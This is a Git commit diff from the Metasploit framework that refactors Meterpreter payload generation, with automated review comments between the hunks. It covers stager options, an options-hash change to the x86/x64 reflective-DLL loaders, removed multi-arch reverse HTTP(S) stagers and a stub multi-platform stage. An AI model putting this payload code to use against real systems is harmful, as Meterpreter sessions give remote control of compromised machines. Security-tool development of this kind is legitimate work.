Another interim commit moving towards universal handlers

bug/bundler_fix
OJ 2016-11-04 13:25:02 +10:00
parent 09d9733a75
commit b0970783ff
No known key found for this signature in database
GPG Key ID: D5DC61FB93260597
19 changed files with 161 additions and 95 deletions


@ -0,0 +1,26 @@
# -*- coding: binary -*-
require 'msf/base/sessions/meterpreter'
module Msf
module Sessions
###
#
# This class creates a platform-independent meterpreter session type
#
###
class Meterpreter_Multi < Msf::Sessions::Meterpreter
def initialize(rstream, opts={})
super
self.base_platform = 'unknown'
self.base_arch = ARCH_UNKNOWN
# TODO: can we read the opts and find the UUID to instantiate the right
# session type? Is it important?
end
end
end
end
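Review bot: `Meterpreter_Multi#initialize` pins `base_platform` to 'unknown' and `base_arch` to `ARCH_UNKNOWN` and never reads `opts`, so as far as this file shows the session keeps those placeholder values unless something elsewhere updates them. The TODO asks whether that matters; answering it in the comment would tell a reader whether code that branches on platform or arch can trust these fields, e.g. `# platform/arch are placeholders until the session reports real values (see <where this is updated>)`. The class comment could also name which handlers create this session type.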


@ -15,14 +15,22 @@ module Msf
module Payload::Multi::ReverseHttp module Payload::Multi::ReverseHttp
include Msf::Payload::UUID::Options include Msf::Payload::UUID::Options
include Msf::Payload::Multi
# #
# Register reverse_http specific options # Register reverse_http specific options
# #
def initialize(*args) def initialize(*args)
super super
# We don't need options here at all. All options are read on the fly from the #register_advanced_options([
# JSON file when a new connection comes in. # OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']),
# OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10]),
# OptString.new('PayloadProxyHost', [false, 'An optional proxy server IP address or hostname']),
# OptPort.new('PayloadProxyPort', [false, 'An optional proxy server port']),
# OptString.new('PayloadProxyUser', [false, 'An optional proxy server username']),
# OptString.new('PayloadProxyPass', [false, 'An optional proxy server password']),
# OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']])
# ], self.class)
end end
# #
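Review bot: The new side of `initialize` replaces the two-line explanation with a nine-line commented-out `register_advanced_options` call, leaving a method body that is only `super` plus dead code. Either delete the block or keep the explanation and add one line saying why the options are parked, e.g. `# Stager/proxy options are intentionally not registered here; they are read per connection from the JSON file`. Commented-out option definitions tend to drift from the live ones and give no hint of whether they are meant to come back. The module continues past the end of this hunk.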


@ -66,14 +66,14 @@ module Payload::Windows::MeterpreterLoader
^ ^
end end
def stage_meterpreter(stageless=false) def stage_meterpreter(opts={})
# Exceptions will be thrown by the mixin if there are issues. # Exceptions will be thrown by the mixin if there are issues.
dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll')) dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll'))
asm_opts = { asm_opts = {
rdi_offset: offset, rdi_offset: offset,
length: dll.length, length: dll.length,
stageless: stageless stageless: opts[:stageless] == true
} }
asm = asm_invoke_metsrv(asm_opts) asm = asm_invoke_metsrv(asm_opts)
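Review bot: Changing `stage_meterpreter(stageless=false)` to `stage_meterpreter(opts={})` is not backward-compatible: any caller not updated in this commit that still passes a boolean will fail on `opts[:stageless]`, because `true` and `false` have no `[]` method. The strict `opts[:stageless] == true` also means every other truthy value (the string 'true', 1) selects the staged path, which deserves a comment such as `# opts[:stageless] must be exactly true; anything else builds a staged loader`. The same applies to the x64 loader section that follows. The method body continues outside the hunk.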


@ -69,14 +69,14 @@ module Payload::Windows::MeterpreterLoader_x64
^ ^
end end
def stage_meterpreter(stageless=false) def stage_meterpreter(opts={})
# Exceptions will be thrown by the mixin if there are issues. # Exceptions will be thrown by the mixin if there are issues.
dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll')) dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll'))
asm_opts = { asm_opts = {
rdi_offset: offset, rdi_offset: offset,
length: dll.length, length: dll.length,
stageless: stageless stageless: opts[:stageless] == true
} }
asm = asm_invoke_metsrv(asm_opts) asm = asm_invoke_metsrv(asm_opts)


@ -40,8 +40,9 @@ module MetasploitModule
], self.class) ], self.class)
end end
def generate def generate(opts={})
stage_meterpreter(true) + generate_config opts[:stageless] = true
stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})
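Review bot: `generate(opts={})` writes `opts[:stageless] = true` into the hash the caller passed in, so a caller that reuses that hash afterwards sees the flag set. Working on a copy avoids the side effect: `opts = opts.merge(stageless: true)` before the `stage_meterpreter(opts) + generate_config(opts)` line. The same two lines appear in the `generate` method of every other stageless module section on this page.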


@ -40,13 +40,13 @@ module MetasploitModule
], self.class) ], self.class)
end end
def generate def generate(opts={})
stage_meterpreter(true) + generate_config opts[:stageless] = true
stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})
opts[:uuid] ||= generate_payload_uuid opts[:uuid] ||= generate_payload_uuid
opts[:stageless] = true
# create the configuration block # create the configuration block
config_opts = { config_opts = {
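Review bot: With `opts[:stageless] = true` removed from `generate_config`, the flag is now set only when the call comes through `generate`; a direct call to `generate_config` with a hash that lacks `:stageless` no longer gets it. Whether the config block built below reads that key is not visible here, because the method continues outside the hunk, so this should be checked against its callers. If direct calls are expected, a non-mutating `opts = opts.merge(stageless: true)` at the top of `generate_config` keeps the old behaviour. The same removal appears in the other 13-line `generate`/`generate_config` sections on this page.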


@ -40,13 +40,13 @@ module MetasploitModule
], self.class) ], self.class)
end end
def generate def generate(opts={})
stage_meterpreter(true) + generate_config opts[:stageless] = true
stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})
opts[:uuid] ||= generate_payload_uuid opts[:uuid] ||= generate_payload_uuid
opts[:stageless] = true
# create the configuration block # create the configuration block
config_opts = { config_opts = {


@ -41,8 +41,9 @@ module MetasploitModule
], self.class) ], self.class)
end end
def generate def generate(opts={})
stage_meterpreter(true) + generate_config opts[:stageless] = true
stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})


@ -40,8 +40,9 @@ module MetasploitModule
], self.class) ], self.class)
end end
def generate def generate(opts={})
stage_meterpreter(true) + generate_config opts[:stageless] = true
stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})


@ -40,8 +40,9 @@ module MetasploitModule
], self.class) ], self.class)
end end
def generate def generate(opts={})
stage_meterpreter(true) + generate_config opts[:stageless] = true
stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})


@ -40,13 +40,13 @@ module MetasploitModule
], self.class) ], self.class)
end end
def generate def generate(opts={})
stage_meterpreter(true) + generate_config opts[:stageless] = true
stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})
opts[:uuid] ||= generate_payload_uuid opts[:uuid] ||= generate_payload_uuid
opts[:stageless] = true
# create the configuration block # create the configuration block
config_opts = { config_opts = {


@ -40,13 +40,13 @@ module MetasploitModule
], self.class) ], self.class)
end end
def generate def generate(opts={})
stage_meterpreter(true) + generate_config opts[:stageless] = true
stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})
opts[:uuid] ||= generate_payload_uuid opts[:uuid] ||= generate_payload_uuid
opts[:stageless] = true
# create the configuration block # create the configuration block
config_opts = { config_opts = {


@ -41,8 +41,9 @@ module MetasploitModule
], self.class) ], self.class)
end end
def generate def generate(opts={})
stage_meterpreter(true) + generate_config opts[:stageless] = true
stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})


@ -40,8 +40,9 @@ module MetasploitModule
], self.class) ], self.class)
end end
def generate def generate(opts={})
stage_meterpreter(true) + generate_config opts[:stageless] = true
stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})


@ -1,32 +0,0 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_http'
require 'msf/core/payload/multi/reverse_http'
module MetasploitModule
CachedSize = :dynamic
include Msf::Payload::Stager
include Msf::Payload::Multi::ReverseHttp
# TODO: Add something to this that stops it from being usable from
# inside msfvenom (technically this isn't a payload)
def initialize(info = {})
super(merge_info(info,
'Name' => 'Reverse HTTP Stager (multi-arch)',
'Description' => 'Tunnel communication over HTTP (multi-architecture)',
'Author' => 'OJ Reeves',
'License' => MSF_LICENSE,
'Platform' => %w{ android java linux osx php python unix win },
'Arch' => [ARCH_X86, ARCH_X64, ARCH_PYTHON, ARCH_JAVA],
'Handler' => Msf::Handler::ReverseHttp,
'Convention' => 'http'))
end
end


@ -1,31 +0,0 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_https'
require 'msf/core/payload/multi/reverse_https'
module MetasploitModule
CachedSize = :dynamic
include Msf::Payload::Stager
include Msf::Payload::Multi::ReverseHttps
# TODO: Add something to this that stops it from being usable from
# inside msfvenom (technically this isn't a payload)
def initialize(info = {})
super(merge_info(info,
'Name' => 'Reverse HTTPS Stager (multi-arch)',
'Description' => 'Tunnel communication over HTTPS (multi-architecture)',
'Author' => 'OJ Reeves',
'License' => MSF_LICENSE,
'Platform' => %w{ android java linux osx php python unix win },
'Arch' => [ARCH_X86, ARCH_X64, ARCH_PYTHON, ARCH_JAVA],
'Handler' => Msf::Handler::ReverseHttps,
'Convention' => 'https'))
end
end


@ -0,0 +1,89 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/base/sessions/meterpreter_multi'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
###
#
# Injects the meterpreter server DLL via the Reflective Dll Injection payload
# along with transport related configuration.
#
###
module MetasploitModule
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
super(update_info(info,
'Name' => 'Architecture-Independent Meterpreter Stage',
'Description' => 'Handle Meterpreter sessions regardless of the target arch/platform',
'Author' => ['OJ Reeves'],
'PayloadCompat' => {'Convention' => ['http', 'https']},
'License' => MSF_LICENSE,
'Session' => Msf::Sessions::Meterpreter_Multi))
end
def stage_payload(opts={})
#return nil unless opts[:uuid]
## TODO: load the "stuff" from the JSON file?
## and if we find an instance, hydrate based on that.
## otherwise use some "sane defaults" as shown below.
#c = Class.new(::Msf::Payload)
#c.include(::Msf::Payload::Stager)
#case opts[:uuid].platform
#when 'python'
# require 'msf/core/payload/python/meterpreter_loader'
# c.include(::Msf::Payload::Python::MeterpreterLoader)
#when 'java'
# require 'msf/core/payload/java/meterpreter_loader'
# c.include(::Msf::Payload::Java::MeterpreterLoader)
#when 'php'
# require 'msf/core/payload/php/meterpreter_loader'
# c.include(::Msf::Payload::Php::MeterpreterLoader)
#when 'windows'
# require 'msf/core/payload/windows/meterpreter_loader'
# if opts[:uuid].arch == ARCH_X86
# c.include(::Msf::Payload::Windows::MeterpreterLoader)
# else
# c.include(::Msf::Payload::Windows::MeterpreterLoader_x64)
# end
#else
# return nil
#end
#second_stage = c.new()
#second_stage.stage_meterpreter(opts) + generate_config(opts)
''
end
def generate_config(opts={})
#ds = opts[:datastore] || datastore
## create the configuration block, which for staged connections is really simple.
#config_opts = {
# arch: opts[:uuid].arch,
# exitfunk: ds['EXITFUNC'],
# expiration: ds['SessionExpirationTimeout'].to_i,
# uuid: opts[:uuid],
# transports: [transport_config(opts)],
# extensions: []
#}
## create the configuration instance based off the parameters
#config = Rex::Payloads::Meterpreter::Config.new(config_opts)
## return the binary version of it
#config.to_b
''
end
end
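Review bot: Both `stage_payload` and `generate_config` return `''` while their entire bodies are commented out, so this stage currently produces nothing and no comment says so. The header comment ("Injects the meterpreter server DLL via the Reflective Dll Injection payload") looks carried over from a Windows stage and does not describe an architecture-independent module. I would rewrite it to state what the module does today, mark each stub with `# NOTE: placeholder, returns an empty value until per-UUID dispatch is implemented`, and move the commented-out draft out of the file. `require 'rex/payloads/meterpreter/config'` is referenced only by the commented-out code.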


@ -33,7 +33,7 @@ module MetasploitModule
end end
def stage_payload(opts={}) def stage_payload(opts={})
stage_meterpreter + generate_config(opts) stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})


@ -33,7 +33,7 @@ module MetasploitModule
end end
def stage_payload(opts={}) def stage_payload(opts={})
stage_meterpreter + generate_config(opts) stage_meterpreter(opts) + generate_config(opts)
end end
def generate_config(opts={}) def generate_config(opts={})